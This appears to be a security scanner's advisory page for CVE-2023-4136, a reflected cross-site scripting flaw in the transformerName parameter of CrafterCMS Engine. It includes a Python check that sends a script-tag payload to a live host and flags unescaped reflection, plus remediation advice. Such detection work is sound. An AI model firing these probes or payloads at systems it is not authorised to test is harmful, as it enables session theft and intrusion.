CVE-2023-4136 Scanner

CVE-2023-4136 Scanner - Cross-Site Scripting vulnerability in CrafterCMS Engine

Short Info

Level: Medium
Scan type: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 8 days 19 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -

CrafterCMS Engine is the content delivery component of CrafterCMS, an open-source content management system used by developers and organizations to build and serve web content dynamically. It is a modular, extensible platform for websites and digital experiences and exposes plugins and REST APIs for content transformation and delivery. It is adopted across industries for its ease of integration and scalability, is maintained by an open-source community, and receives regular updates that fix bugs and security issues. Enterprises that need a customizable CMS are its typical users.

The detected vulnerability is a reflected Cross-Site Scripting (XSS) issue caused by missing output encoding of user input supplied in the transformerName parameter of the /api/1/site/url/transform endpoint. Because the parameter value is echoed back into the HTTP response, an attacker can craft a URL whose transformerName value contains JavaScript, and that script runs in the browser of any user who opens the link, in the origin of the affected CrafterCMS site. Exploitation can lead to theft of session cookies or other credentials, session hijacking, or arbitrary actions performed on behalf of the victim. The vulnerability requires user interaction: the victim must be induced to visit the attacker-crafted URL, typically via a malicious link.

Technically, the vulnerability exists because the transformerName value is reflected into the HTTP response without validation or context-appropriate encoding. When a crafted script tag is injected, the browser parses it as markup and executes it. The scan detects this by sending a request whose transformerName contains a script payload and then checking three things in the response: that the payload appears in the body verbatim (not HTML-encoded), that the response carries an HTML Content-Type so a browser would actually render and execute it, and that the status code matches the error response in which CrafterCMS echoes the unknown transformer name. All three conditions together confirm the finding; a reflection into a JSON or plain-text response alone would not be browser-executable and is not reported. The finding indicates a lack of input filtering and output escaping in the application.
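The decision logic described above, written out as an added example (this is not the scanner's own code or CrafterCMS code). The endpoint path and parameter name come from the advisory; the target host, the alert token in the payload, the accepted status codes, and the three sample responses are constructed here for illustration. The "escaped" sample also shows the remediation side: the same reflection passed through HTML entity encoding no longer matches.

```python
import html
import urllib.error
import urllib.request
from urllib.parse import urlencode, urljoin

# Endpoint and parameter named in the advisory. The host is a placeholder.
BASE_URL = "https://crafter.example.test"          # hypothetical target
ENDPOINT = "/api/1/site/url/transform"
PARAM = "transformerName"
# Unique token in the payload so we match our own reflected string,
# not some script tag that was already in the page.
PAYLOAD = "<script>alert('s4e7f3a')</script>"
# Status codes we treat as plausible for a reflecting error page (assumption).
ACCEPTED_STATUSES = frozenset({200, 400, 500})


def build_probe_url(base_url: str = BASE_URL, payload: str = PAYLOAD) -> str:
    """URL of the reflected-XSS probe: payload URL-encoded into transformerName."""
    return urljoin(base_url, ENDPOINT) + "?" + urlencode({PARAM: payload})


def is_reflected_xss(status: int, headers: dict, body: str,
                     payload: str = PAYLOAD) -> bool:
    """Vulnerable only if ALL hold: accepted status, HTML Content-Type,
    and the payload present in the body byte-for-byte (i.e. unescaped)."""
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    if status not in ACCEPTED_STATUSES:
        return False
    if "text/html" not in ctype.lower():
        return False           # JSON/plain-text reflection is not browser-executable
    return payload in body


def probe_live(url: str, timeout: float = 10.0) -> tuple[int, dict, str]:
    """Fetch the probe URL and return (status, headers, body); 4xx/5xx are
    returned rather than raised because the reflecting page is an error page."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2023-4136-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")


# Constructed sample responses (not captured from a real system).
VULNERABLE_RESPONSE = {
    "status": 500,
    "headers": {"Content-Type": "text/html;charset=UTF-8"},
    "body": f"<html><body>Transformer {PAYLOAD} not found</body></html>",
}
# Same page after the fix: the reflected name is entity-encoded on output.
ESCAPED_RESPONSE = {
    "status": 500,
    "headers": {"Content-Type": "text/html;charset=UTF-8"},
    "body": f"<html><body>Transformer {html.escape(PAYLOAD)} not found</body></html>",
}
# Raw reflection, but into a JSON body: the Content-Type check must reject it.
JSON_RESPONSE = {
    "status": 500,
    "headers": {"Content-Type": "application/json"},
    "body": '{"message":"Transformer ' + PAYLOAD + ' not found"}',
}


def run_samples() -> dict:
    """Evaluate the three constructed responses; used for the offline demo."""
    return {
        "vulnerable": is_reflected_xss(**VULNERABLE_RESPONSE),
        "escaped": is_reflected_xss(**ESCAPED_RESPONSE),
        "json": is_reflected_xss(**JSON_RESPONSE),
    }


if __name__ == "__main__":
    print("probe URL:", build_probe_url())
    for name, flagged in run_samples().items():
        print(f"{name:10s} -> {'VULNERABLE' if flagged else 'not flagged'}")
```

To run it against a real host, pass `probe_live(build_probe_url("https://your-host"))` into `is_reflected_xss(*...)`; the module-level demo only evaluates the constructed samples so it runs offline.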

If exploited, attackers can act within the security context of the affected user: steal session cookies that are not marked HttpOnly, redirect the user to attacker-controlled sites, or alter the displayed content. This compromises user privacy and can be a stepping stone to further attacks on the application or its users; the impact falls mainly on the confidentiality and integrity of user data. Remediation is to upgrade CrafterCMS to a release in which the vendor has fixed this issue, so that the transformerName value is validated and HTML-encoded before it is written into the response. As defense in depth, serve a restrictive Content-Security-Policy and set the HttpOnly and Secure flags on session cookies to limit what an injected script can do.
